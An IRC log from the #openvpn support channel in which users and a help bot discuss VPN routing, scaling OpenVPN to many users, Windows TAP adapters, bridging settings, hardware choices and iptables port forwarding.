04:37 <+pekster> con3x: Wrong. the CNAME returns multiple A records which you clearly aren't handling
04:37 <+pekster> Now that list could still be part of a larger rotation, but it's not a single IP
04:37 <+pekster> https://pastee.org/2y6f5
04:37 < kunji1> By addressing on the server I mean the ip and range the server pushes to the client.
04:38 <+pekster> kunji1: The client might have failed to apply the fake-DHCP reply. Or the server might not be passing the options that match your LAN network
04:38 <+pekster> This is why you verify client addressing is correct
04:39 <+pekster> kunji1: Oh, and it also rotates the list of 8 you get back. Yup, you can't do that (as I noted above.) How about a web proxy ;)
04:40 <+pekster> con3x: ^^ that was for you
04:40 <+pekster> It'll work until the TTL expires, or about 60 seconds tops
04:40 <+pekster> ie: don't do that
04:40 < kunji1> Yeah, that second part, it wasn't very clear in what I read that it should match the LAN network, that's what I changed for testing tomorrow, it did report getting an IP, and it was in the configured range, and that did show properly when running ipconfig.
04:42 < con3x> pekster: Sorry, never meant it was a single IP, points towards a domain with 8 A records
04:42 < kunji1> con3x: There's probably an easier solution, but you could probably use snort for that.
04:43 < con3x> https://pastee.org/gevag
04:43 < con3x> and they change really frequently
04:46 -!- Minnebo [~Minnebo@office.exabyte.be] has joined #openvpn
04:48 * con3x writes a script to update routes every 60 seconds, FOR SCIENCE!
04:48 <+pekster> What happens when, 1 second after your 1/60s script runs, the TTL expires?
04:49 <+pekster> Don't keep trying to pound a nail in with a fistful of water. Use a browser proxy
04:49 -!- tMobile4a03 [~T4@n218250229105.netvigator.com] has quit [Read error: Connection timed out]
04:50 < con3x> It won't work for the other devices sadly
04:50 <+pekster> transparent proxying works nicely
04:50 <+pekster> Or put them on a unique subnet and policy route
04:50 <+pekster> Or a handful of smarter choices
04:50 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has joined #openvpn
04:50 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has quit [Write error: Connection reset by peer]
04:51 < con3x> How would I do that? :)
04:51 <+pekster> A transparent proxy? Plenty of guides online to help
04:51 <+pekster> LARTC is a good place to start if you want to learn about policy routing and split routing: http://lartc.org/howto/
04:51 <@vpnHelper> Title: Linux Advanced Routing & Traffic Control HOWTO (at lartc.org)
04:52 < con3x> Thanks again :)
04:56 -!- Minnebo [~Minnebo@office.exabyte.be] has quit [Quit: Ik ga weg]
05:34 -!- holmen_ is now known as holmen
05:52 -!- mattock is now known as mattock_afk
05:53 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn
06:05 -!- mattock_afk is now known as mattock
06:10 -!- donhoe [~jeepers@c-69-247-138-234.hsd1.tn.comcast.net] has quit [Ping timeout: 245 seconds]
06:11 -!- donhoe [~jeepers@c-69-247-138-234.hsd1.tn.comcast.net] has joined #openvpn
06:15 -!- donhoe [~jeepers@c-69-247-138-234.hsd1.tn.comcast.net] has quit [Ping timeout: 245 seconds]
06:29 -!- donhoe [~jeepers@31.193.12.99] has joined #openvpn
07:10 -!- dazo_afk is now known as dazo
07:58 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
08:04 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]]
08:08 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 252 seconds]
08:21 -!- ade_b [~Ade@129.178.182.25] has joined #openvpn
08:21 -!- ade_b [~Ade@129.178.182.25] has quit [Changing host]
08:21 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
08:24 -!- Azrael808 [~peter@212.161.9.162] has quit [Quit: Ex-Chat]
08:52 -!- ade_ [~Ade@129.178.182.25] has joined #openvpn
08:53 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 248 seconds]
08:55 -!- ade_ is now known as ade_b
08:56 -!- ade_b [~Ade@129.178.182.25] has quit [Changing host]
08:56 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
09:00 -!- u0m3_ [~Radu@92.80.72.203] has joined #openvpn
09:01 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn
09:03 -!- u0m3 [~Radu@92.80.72.203] has quit [Ping timeout: 248 seconds]
09:04 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Quit: Leaving]
09:20 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 245 seconds]
09:21 -!- ducblangis [~Ducblangi@24-117-207-111.cpe.cableone.net] has joined #openvpn
09:33 -!- s51itxsyc [~s51itxsyc@124.207.123.109] has joined #openvpn
09:35 < s51itxsyc> guys how do you make it work if we have roughly 2000 users online at the same time, run them in a single subnet, or split several in multiple conf files?
09:36 -!- BtbN [~btbn@btbn.de] has quit [Quit: Bye]
09:36 -!- BtbN [~btbn@btbn.de] has joined #openvpn
09:45 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn
09:45 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn
09:47 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit]
09:50 <@ecrist> s51itxsyc: you have that many people connected to openvpn?
09:50 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
09:53 -!- bauruine [~stefan@91.236.116.112] has quit [Quit: Leaving]
09:55 -!- swat [~swat@ubuntu/member/swat] has quit [Quit: Leaving.]
09:55 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn
09:58 < ducblangis> Holy.Shit.Man
09:59 < ducblangis> 2000
10:04 <@dazo> s51itxsyc: multiple conf files, on different ports per openvpn instance, but they need to be separate (for simplicity in config) VPN subnets, but you can add routes so they can access the subnet(s) they need
10:05 <@dazo> s51itxsyc: but if all in one single subnet is a strict requirement, then there are no other options .... except perhaps switching to TAP and using bridging - but that will fail instantly, due to the massive broadcast traffic
10:06 <@dazo> (you would probably need between 10 and 20 openvpn instances too, for that amount of users to make it perform reasonably well if all clients are using all their bandwidth)
10:07 < wh1p> to be honest if you're going to roll out a vpn to 2000 users i would just not even consider going the open source route
10:07 < wh1p> with stuff like that you need real business support
10:07 <@dazo> wh1p: no problem with open source software in such an enterprise setup ... but going for the OpenVPN AS Server would be advisable
10:08 < wh1p> it can be done and im not going to stop you but plan it the open source way and then go and plan it the proper way using proprietary cisco, draytek, sonicwall etc etc
10:08 <@dazo> OpenVPN AS is a commercially supported solution by OpenVPN Technologies, though ....
10:09 < wh1p> you will find your life easier, the support better and the service overall will probably be amazing with the proper setup in comparison to a home cooked idea
10:09 <@dazo> but my point is that, that doesn't exclude open source (in general) as a viable solution .... as long as you got the support need covered
10:09 < wh1p> my honest opinion is that going opensource is all cool and that but if something goes wrong and you can't fix it yourself, the proper business route with something like that really needs to be there
10:10 <+rob0> Most "real business support" options I see are incredibly lame. But to be fair, I doubt that applies to OpenVPN Technologies.
10:10 <+rob0> If you can't fix it yourself, hire someone who can.
10:11 < wh1p> im not saying dont go open source i love the idea but with something that crucial it seems like it could cause really big problems for staff
10:11 <@dazo> wh1p: so you're saying New York Stock Exchange did a bad move when going for Red Hat Enterprise Linux?
10:11 < wh1p> ^read my comment above i love open source and the ideas and contributions behind it
10:11 <@dazo> but open source doesn't mean there's no good support solution around it ....
10:12 <@dazo> even commercial
10:12 < wh1p> but a vpn being the back bone for 2000 machines could be a really critical thing to business operations
10:14 < wh1p> ok so let me go back to your original question
10:15 <@dazo> well, hardware solutions might be better suited ... but that doesn't mean open source isn't suitable either
10:16 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt]
10:17 < wh1p> never said it wasn't suitable
10:18 < s51itxsyc> thanks for all your comments guys dazo wh1p rob0 :)
10:18 <+rob0> oh, I didn't address the question :)
10:19 <+rob0> The biggest drawback to one server for that many users is the lack of threading support.
10:19 <@dazo> wh1p: you did say this: "a vpn to 2000 users i would just not even consider going the open source route" .... that sounds like you don't find it suitable
10:19 <+rob0> For that reason I would probably break it up into several.
10:21 < wh1p> dazo: i did say that because with something on that scale imho i would not like to be the one supporting a half baked roll out, sure if it was all planned and rolled out properly and had some sort of support plan with openvpn it would be great
10:22 -!- master_of_master [~master_of@p57B52905.dip.t-dialin.net] has quit [Ping timeout: 252 seconds]
10:23 -!- master_of_master [~master_of@p57B55DD0.dip.t-dialin.net] has joined #openvpn
10:23 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 272 seconds]
10:26 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Ping timeout: 248 seconds]
10:26 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 260 seconds]
10:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
10:34 < con3x> I wrote a script to constantly add the netflix routes to my routing table
10:35 < con3x> Seems to be working good enough :)
10:39 -!- suprsonic [~suprsonic@services.landonsanderson.com] has joined #openvpn
10:39 < suprsonic> what's the recommended key length for openssl?
10:41 -!- s34n [~chatzilla@ip-208-76-93-210.mvdsl.com] has joined #openvpn
10:47 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 255 seconds]
10:51 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 240 seconds]
10:59 < s34n> I had a working config for gnome's network manager openvpn plugin on my last computer
10:59 < s34n> Where can I find that to copy it to my new computer?
10:59 -!- suprsonic [~suprsonic@services.landonsanderson.com] has left #openvpn []
11:01 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn
11:04 -!- defswork [~andy@141.0.50.105] has joined #openvpn
11:04 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Ping timeout: 260 seconds]
11:04 -!- Orbi [~opera@anon-149-21.vpn.ipredator.se] has joined #openvpn
11:06 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
11:10 -!- raidz_away is now known as raidz
11:11 -!- Orbi [~opera@anon-149-21.vpn.ipredator.se] has quit [Ping timeout: 240 seconds]
11:22 < s34n> I'm a little bit confused about the ip addresses requested by the gnome network manager plugin
11:22 < s34n> it wants a gateway, a remote ip address, and a local ip address
11:23 < s34n> I was expecting to provide the address of the vpn server and have my client negotiate things from there with the server
11:23 -!- NChief [tomme@unaffiliated/nchief] has quit [Quit: leaving]
11:24 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn
11:32 < kunji1> I'm a complete noob at OpenVPN, but from the documentation, you should be able to do it that way, maybe not while using the gnome plugin, but then again, I don't remember having to fill out all of that for the plugin either. I thought you give the plugin your openVPN client configuration file, no?
11:34 <+rob0> Well, that's just it. If you're asking Network Manager questions in the #openvpn channel, you might not get much help.
11:34 <+rob0> !notovpn
11:34 <@vpnHelper> "notovpn" is "notopenvpn" is your problem is not about openvpn, and while we try to be helpful, you may have a better chance of finding your answer if you ask your question in a channel related to your problem
11:51 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 264 seconds]
12:15 -!- tyteen4a03 [~T4@n218250229105.netvigator.com] has joined #openvpn
12:17 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
12:18 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
12:21 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
12:25 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
12:25 -!- b1rkh0ff [~b1rkh0ff@178.77.1.200] has quit [Ping timeout: 255 seconds]
12:26 -!- Mimiko [~Mimiko@89.28.88.177] has quit []
12:26 -!- Orbi [~opera@anon-185-138.vpn.ipredator.se] has joined #openvpn
12:28 -!- Hugh_Man [~Hugh_Man@c-68-61-229-187.hsd1.mi.comcast.net] has joined #openvpn
12:29 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 252 seconds]
12:31 -!- izibi [~julian@unaffiliated/izibi] has joined #openvpn
12:32 < izibi> hi. how can i prevent openvpn from creating routes to the tunnel endpoint?
12:33 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn
12:33 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
12:33 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn
12:36 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 255 seconds]
12:36 -!- Orbi [~opera@anon-185-138.vpn.ipredator.se] has quit [Ping timeout: 272 seconds]
12:38 -!- s51itxsyc [~s51itxsyc@124.207.123.109] has quit [Ping timeout: 276 seconds]
12:38 -!- b1rkh0ff [~b1rkh0ff@178.77.7.250] has joined #openvpn
12:45 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn
12:47 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 256 seconds]
12:54 < izibi> or what would even be better: how can i change the gateway for the route to the tunnel endpoint?
12:59 -!- s34n [~chatzilla@ip-208-76-93-210.mvdsl.com] has quit [Ping timeout: 276 seconds]
13:01 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn
13:02 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 240 seconds]
13:05 -!- brute11k [~brute11k@89.249.235.236] has quit [Ping timeout: 255 seconds]
13:05 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Client Quit]
13:05 -!- brute11k [~brute11k@89.249.235.236] has joined #openvpn
13:07 -!- s34n [~chatzilla@ip-208-76-93-210.mvdsl.com] has joined #openvpn
13:07 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
13:11 -!- Hugh_Man [~Hugh_Man@c-68-61-229-187.hsd1.mi.comcast.net] has quit [Ping timeout: 264 seconds]
13:33 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has joined #openvpn
13:35 < KaiForce> Is there a how-to for multiple simultaneous connections from a windows client? Assuming that is possible, that is.
13:44 <+rob0> I suppose it is, but I don't use Windows. If all of those servers redirect the gateway, it would be rather ugly, of course. If they're just to connect to that site/LAN, however, it should be no problem.
13:50 < KaiForce> no, should not redirect gw. just to get to LAN
13:50 < KaiForce> to remote LANs i mean. A work from home person accessing multiple offices.
13:56 <+rob0> Another potential problem is if the LAN or VPN network ranges overlap/conflict.
13:57 < KaiForce> No they are distinct
13:59 < KaiForce> I'm just trying to figure out how to connect the second connection. When I connect more than one, I get "All TAP-Win32 adapters on this system are currently in use."
14:01 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has joined #openvpn
14:07 < KaiForce> Ok, found it. There is an "addtap.bat" file in the bin folder for OpenVPN GUI. It creates additional TAP adapters (at least on XP, I'll have to see on Win 7)
14:23 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection]
14:24 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn
14:26 -!- brute11k [~brute11k@89.249.235.236] has quit [Quit: Leaving.]
14:27 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
14:39 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
14:39 -!- mode/#openvpn [+v s7r] by ChanServ
14:48 -!- zaki [~guest@93.98.88.82] has joined #openvpn
14:57 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Read error: Connection reset by peer]
14:57 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn
14:58 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye]
15:38 -!- wh1p [~angus@host-2-100-148-6.as13285.net] has quit [Quit: Leaving]
15:52 -!- wh1p [~angus@host-2-100-148-6.as13285.net] has joined #openvpn
15:53 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 245 seconds]
15:57 -!- corretico [~luis@190.211.93.38] has joined #openvpn
16:01 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 18.0/20130104151925]]
16:07 -!- JackWinter1 [~jack@vodsl-4655.vo.lu] has quit [Quit: ZNC - http://znc.in]
16:08 -!- p3rror [~mezgani@41.249.97.52] has joined #openvpn
16:09 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn
16:17 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn
16:28 -!- s34n [~chatzilla@ip-208-76-93-210.mvdsl.com] has left #openvpn []
16:31 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn
16:32 -!- p3rror [~mezgani@41.249.97.52] has quit [Quit: Leaving]
16:45 -!- swat [~swat@ubuntu/member/swat] has quit [Ping timeout: 260 seconds]
17:07 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit []
17:15 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Ping timeout: 264 seconds]
17:21 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
17:21 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 276 seconds]
17:28 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn
17:58 -!- kusznir [~kusznir@76.178.145.28] has joined #openvpn
17:58 < kusznir> Hi all: quick question: Does anyone know of a rackmount switch currently available (preferably 16-port, 100base-T) that has internal OpenVPN support?
18:01 < wh1p> openvpn is not something you would find in a switch, rather something more like a router
18:04 < wh1p> kusznir: i would advise building a linux box and setting up openvpn on it
18:04 < wh1p> i will have a look see if i can find anything though which has openvpn built in
18:04 < kusznir> wh1p: I guess I was asking if anyone knew of a switch that included enough routing functionality to be a vpn endpoint.
18:05 < wh1p> no afaik that would never work
18:05 < kusznir> I found the Ubiquiti EdgeRouter, but it isn't actually shipping yet.
18:05 < kusznir> And I've seen other people with "vpn devices" that have ~8 ethernet ports on them.
18:06 < kusznir> I'd like a step up from a consumer-grade router running dd-wrt/openwrt hooked up to a switch.
18:06 < kusznir> An alix box would work I know...http://store.netgate.com/ALIX2D2-Kit-Black-Unassembled-P187C86.aspx
18:06 <@vpnHelper> Title: ALIX.2D2 Kit Black Unassembled @ Netgate (at store.netgate.com)
18:06 < wh1p> have a look at these products, i heard that some of them might support openvpn
18:06 < wh1p> http://www.wifi-stock.co.uk/products/routerboards-mikrotik.html
18:06 <@vpnHelper> Title: Wifi-stock.co.uk - Routerboards (Mikrotik) - WiFi Networking products at lowest prices in UK and Ireland (at www.wifi-stock.co.uk)
18:07 < kusznir> Also curious how common the hardware accelerated encryption is...I don't think it will be a big deal (don't plan on pushing high data rates), but I am also talking fairly weak processors...
18:08 < kusznir> My understanding is the geode processors have a built-in hardware encryption engine that I'm told OpenVPN will take advantage of.
18:08 <@dazo> kusznir: build your own using a supermicro server? they got quite nicely priced 1U rack mountable servers
18:08 <@dazo> I dunno about geode ... but Intel CPUs with AES-NI instructions work very well
18:10 <@dazo> http://www.supermicro.nl/products/system/1U/
18:10 <@vpnHelper> Title: Supermicro | Products | SuperServers | 1U (at www.supermicro.nl)
18:12 < kusznir> dazo: do you know if the atom CPUs have the instruction?
18:12 <@dazo> kusznir: dunno ... gotta check Intel's specs on their 'ark' site ..
18:13 <@dazo> kusznir: seems not ... http://ark.intel.com/products/71267/Intel-Atom-Processor-S1260-1MB-Cache-2_00-GHz
18:15 <@dazo> This one got AES-NI ... http://www.supermicro.nl/products/system/1U/5017/SYS-5017P-TF.cfm / http://ark.intel.com/products/65704/Intel-Core-i5-3610ME-Processor-3M-Cache-up-to-3_30-GHz
18:15 <@vpnHelper> Title: Supermicro | Products | SuperServers | 1U | 5017P-TF (at www.supermicro.nl)
18:15 <@dazo> (same compact box, but far more power in the CPU)
18:15 < kusznir> I was looking to avoid a full-fledged server install. This is supporting 15 embedded systems moving about 25k every 15min over a VPN.
18:16 <@dazo> kusznir: install Scientific Linux 6 ... and you'll get all updates going in automatically .... even embedded stuff needs to be updated regularly too, which is often a more cumbersome process
18:17 <@dazo> (and iirc, Scientific Linux 6 will have updates going on until 2020)
18:18 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn []
18:27 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux]
18:29 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has joined #openvpn
18:31 <@raidz> OpenVPN iOS App now available in the App Store
18:34 -!- kunji [~Kunji@141.216.172.169] has joined #openvpn
18:34 < dioz> can i do server-bridge 192.168.0.1 255.255.255.0 192.168.0.1 192.168.0.1 ?
18:35 < dioz> tap
18:35 <@raidz> https://itunes.apple.com/us/app/openvpn-connect/id590379981
18:35 <@vpnHelper> Title: OpenVPN Connect for iPhone 3GS, iPhone 4, iPhone 4S, iPhone 5, iPod touch (3rd generation), iPod touch (4th generation), iPod touch (5th generation) and iPad on the iTunes App Store (at itunes.apple.com)
18:35 < dioz> coool
18:37 < dioz> the server-bridge objective indicates ip address, subnet, range, range
18:37 < kunji> dioz: umm, wouldn't that try to give out the server's ip to the connecting client?
18:37 < kunji> dioz: I don't think that first ip should be in the range.
18:37 < dioz> there is no range
18:37 < dioz> it's just a single ip
18:39 < kunji> dioz: But isn't that the ip used on the virtual interface of the server, so it should not be an ip the server gives out to a client, I think you should use at least 2 ips, one for the server, and one for the client, aka server-bridge 192.168.0.1 255.255.255.0 192.168.0.2 192.168.0.2
18:40 < kunji> I'm pretty new to this though, hmm, pekster would know, stick around and he'll see it eventually.
18:45 <@dazo> !ios
18:45 <@dazo> !iphone
18:45 <@vpnHelper> "iphone" is (#1) http://github.com/jfx2006/OpenVPN_iphone/downloads for precompiled iphone binaries or (#2) http://modmyi.com/cydia/package.php?id=15784 for the gui portion or (#3) http://www.zdnet.com/blog/hardware/ubuntu-lucid-lynx-1004-can-read-your-iphones-secrets/8424 <-- be aware of that before putting your keys on an iphone or (#4) see http://www.guizmovpn.com/ for an iOS client for OpenVPN for
18:45 <@vpnHelper> iPhone and iPad.
18:46 <@dazo> !forget iphone 1
18:46 <@vpnHelper> Joo got it.
18:46 <@dazo> !iphone
18:46 <@vpnHelper> "iphone" is (#1) http://modmyi.com/cydia/package.php?id=15784 for the gui portion or (#2) http://www.zdnet.com/blog/hardware/ubuntu-lucid-lynx-1004-can-read-your-iphones-secrets/8424 <-- be aware of that before putting your keys on an iphone or (#3) see http://www.guizmovpn.com/ for an iOS client for OpenVPN for iPhone and iPad.
18:46 <@dazo> !forget iphone 1
18:46 <@vpnHelper> Joo got it.
18:46 <@dazo> !iphone
18:46 <@vpnHelper> "iphone" is (#1) http://www.zdnet.com/blog/hardware/ubuntu-lucid-lynx-1004-can-read-your-iphones-secrets/8424 <-- be aware of that before putting your keys on an iphone or (#2) see http://www.guizmovpn.com/ for an iOS client for OpenVPN for iPhone and iPad.
18:46 <@dazo> !forget iphone 2
18:46 <@vpnHelper> Joo got it.
18:47 <@dazo> !learn iphone as "OpenVPN is now available for iOS in the App Store
18:47 <@vpnHelper> Error: No closing quotation
18:47 <@dazo> !learn iphone as OpenVPN is now available for iOS in the App Store
18:47 <@vpnHelper> Joo got it.
18:47 <@dazo> !iphone
18:47 <@vpnHelper> "iphone" is (#1) http://www.zdnet.com/blog/hardware/ubuntu-lucid-lynx-1004-can-read-your-iphones-secrets/8424 <-- be aware of that before putting your keys on an iphone or (#2) OpenVPN is now available for iOS in the App Store
19:02 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Read error: Operation timed out]
19:03 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn
19:03 -!- donhoe [~jeepers@31.193.12.99] has quit [Remote host closed the connection]
19:13 -!- Controlsfreek [~Controlsf@cpe-69-204-135-43.nycap.res.rr.com] has quit [Read error: Connection reset by peer]
19:14 -!- ducblangis [~Ducblangi@24-117-207-111.cpe.cableone.net] has quit [Ping timeout: 276 seconds]
19:14 -!- Controlsfreek [~Controlsf@cpe-69-204-135-43.nycap.res.rr.com] has joined #openvpn
19:35 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has quit [Quit: Leaving]
19:40 < kunji> ?.. I'm still connected to this, hmm
19:42 -!- raidz is now known as raidz_away
19:53 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn
19:53 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has quit [Changing host]
19:53 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn
19:57 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Read error: Connection reset by peer]
19:59 -!- b1rkh0ff [~b1rkh0ff@178.77.7.250] has quit [Ping timeout: 244 seconds]
19:59 -!- kunji [~Kunji@141.216.172.169] has quit [Read error: Connection reset by peer]
19:59 -!- kunji1 [~Kunji@141.216.172.169] has joined #openvpn
20:10 -!- dazo is now known as dazo_afk
20:11 -!- kunji1 [~Kunji@141.216.172.169] has quit [Read error: Connection reset by peer]
20:27 -!- Guest24601 [~root@216.17.109.26] has joined #openvpn
20:31 -!- s51itxsyc [~s51itxsyc@202.108.130.138] has joined #openvpn
20:43 -!- Guest24601 [~root@216.17.109.26] has left #openvpn []
20:43 -!- cosmicgate [~root@216.17.109.26] has joined #openvpn
20:43 < cosmicgate> Hi,
20:43 < cosmicgate> may i know what is the default encryption cipher for openvpn?
20:46 -!- nucl3ar [~atom@31.193.12.99] has joined #openvpn
21:03 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 248 seconds]
21:04 -!- corretico [~luis@190.211.93.38] has joined #openvpn
21:06 -!- nucl3ar [~atom@31.193.12.99] has quit [Quit: g'byte]
21:27 -!- cosmicgate [~root@216.17.109.26] has quit [Ping timeout: 255 seconds]
21:31 -!- CrashTM [~CrashTM@69.162.93.219] has joined #openvpn
21:31 < CrashTM> how might someone go about forwarding a port to an openvpn client
21:32 < CrashTM> iptables -t nat -A PREROUTING -p tcp --dport (port) -j DNAT --to-destination (client ip)
21:33 < CrashTM> iptables -A FORWARD -s (client ip) -p tcp --dport (port) -j ACCEPT
21:33 < CrashTM> does that look right
21:41 < CrashTM> !def1
21:41 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1"
21:42 < ngharo> !linportforward
21:42 <@vpnHelper> "linportforward" is (#1) to forward port 80 tcp to a vpn client, use this (replacing with the real ip of the server, and with the clients VPN ip) or (#2) iptables -t nat -A PREROUTING -i eth0 -d -p tcp --dport 80 -j DNAT --to or (#3) iptables -A FORWARD -m state --state NEW,ESTABLISHED,RELATED -i eth0 -p tcp --dport 80 -j ACCEPT
21:46 -!- Castor_ [Castor_@CPE-72-133-200-232.wi.res.rr.com] has joined #openvpn
21:46 -!- uberushaximus [~uberushax@shepard.sypherz.com] has joined #openvpn
22:00 -!- CrashTM [~CrashTM@69.162.93.219] has quit [Read error: Connection reset by peer]
22:01 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has joined #openvpn
22:01 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has quit [Client Quit]
22:25 -!- ben1066 [~quassel@unaffiliated/ben1066] has quit [Read error: Connection reset by peer]
22:25 -!- ben1066 [~quassel@2a03:b200:9::824e:1e6e] has joined #openvpn
22:25 -!- ben1066 [~quassel@2a03:b200:9::824e:1e6e] has quit [Changing host]
22:25 -!- ben1066 [~quassel@unaffiliated/ben1066] has joined #openvpn
22:53 -!- cosmicgate [~root@216.17.109.26] has joined #openvpn
22:58 -!- cosmicgate [~root@216.17.109.26] has quit [Quit: bye]
--- Day changed Thu Jan 17 2013
00:00 -!- cosmicgate [~root@216.17.109.26] has joined #openvpn
00:02 -!- blackness is now known as blackmagic
00:11 -!- cosmicgate [~root@216.17.109.26] has quit []
00:11 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has quit [Ping timeout: 260 seconds]
00:12 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has joined #openvpn
00:42 -!- brute11k [~brute11k@89.249.235.236] has joined #openvpn
00:50 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has quit [Quit: emmanuelux]
01:28 -!- Varazir_ is now known as Varazir
01:38 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn
01:45 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 260 seconds]
01:45 -!- Minnebo [~Minnebo@office.exabyte.be] has joined #openvpn
01:45 < Minnebo> Guys, i'm still stuck with one problem
01:45 < Minnebo> Can someone check my server/client config?
01:46 -!- cosmicgate [~root@216.17.109.26] has joined #openvpn
01:46 < Minnebo> I can connect and everything works like a charm, but I cannot get the route to work to use \\sbs2011 to get to the shares
01:46 < Minnebo> my server is on 192.168.100.1
01:47 < Minnebo> so I did a push "route 192.168.100.0 255.255.255.0"
01:47 < Minnebo> when I do print route on my client pc
01:48 < Minnebo> I see that the route is added
01:48 <+pekster> Is your DNS or WINS set up to do resolution across the VPN correctly?
01:48 <+pekster> You can't expect private names to resolve without setting that up
